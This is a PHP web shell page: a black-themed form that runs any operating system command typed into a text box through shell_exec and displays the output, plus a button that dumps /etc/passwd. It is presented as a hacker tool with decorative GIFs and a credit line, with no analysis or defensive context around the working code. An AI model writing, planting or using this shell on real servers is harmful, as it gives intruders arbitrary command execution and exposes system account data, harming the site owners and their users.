<body bgcolor="black">
<div class="pic1"> </div>
<div class="aaa">
<div class = "pic3" >
<div class = "pic3" >
<div class = "pic3" >
<div class = "pic3" > </div>
</div>
</div>
</div>
</div>
<center>
<div class="pic2"> </div>
<br>
<form method="post" >
Commands <input type="text" name="txt1" placeholder="Put Any OS Command" class="text1"><br>
<input type="submit" value="Click" class="b" name="submit">
<input type="submit" class="b2all" value="Get etc/password" name="etcpasswd">
</form>
<?php
if(isset($_POST['submit']))
{
$a=$_POST['txt1'];
$output = shell_exec("$a");
echo "<textarea > $output </textarea>";
}
?>
<?php
function etcpasswd()
{
$output = shell_exec("cat /etc/passwd");
echo "<textarea > $output </textarea>";
}
if(isset($_POST['etcpasswd']))
{
etcpasswd();
}
function writemsg1()
{
echo "Hello world! 2";
}
if(isset($_POST['submit1']))
{
writeMsg1();
}
?>
<br />
<br />
<b> <font color="white"> Proudly Powered By <a href="http://www.mithaiwalidukan.in"> Mithai Wali Dukan </a> </font></b>
</center>
<style>
.text1
{
color:#060;
font-family:Arial, Helvetica, sans-serif;
font-size:20px;
font-weight: bold;
border-radius:4px;
}
textarea
{
color:#060;
height:530px;
width:800px;
border:#003366 medium double ;
border-width:20px;
border-radius:5px;
}
textarea:hover
{
color:#060;
height:530px;
width:800px;
border:#003366 medium double ;
border-width:20px;
box-shadow:0px 0px 40px #006600;
border-radius:5px;
}
.b
{
height:35px;
width:80px;
background-color:green;
display:inline-block;
margin-left:60px;
margin-top:10px;
border-radius:10px;
}
.b:hover
{
height:35px;
width:80px;
background-color:green;
box-shadow:0px 0px 40px #006600;
display:inline-block;
border-radius:10px;
}
.pic3
{
background-image:url(http://s12.postimg.org/unvpx414p/Untitled_4.gif);
height:90;
width:100;
background-size:cover;
transition:width 2s, height 2s, transform 2s;
-webkit-transition:width 2s, height 2s, -webkit-transform 2s;
}
.pic3:hover
{
background-image:url(http://s12.postimg.org/unvpx414p/Untitled_4.gif);
height:90;
width:100;
background-size:cover;
transform:rotate(360deg);
-webkit-transform:rotate(360deg);
}
.pic2
{
background-image:url(http://s10.postimg.org/xpzqhm79h/Unt.gif);
height:112;
width:120;
margin-left:950px;
position:absolute;
background-size:contain;
margin-top:25px;
}
.pic1
{
background-image:url(http://s21.postimg.org/563r7v8g3/supertux.gif);
height:102;
width:120;
margin-left:10px;
position:absolute;
margin-top:1px;
}
a:link {color:red;}
a:visited {color:#060;}
a:hover {color:#060;}
a:active {color:white;}
a{text-decoration: none;}
.aaa
{
margin-left:650px;
}
.b2all
{
background-color:green;
display:inline-block;
border-radius:10px;
}
</style>
</body>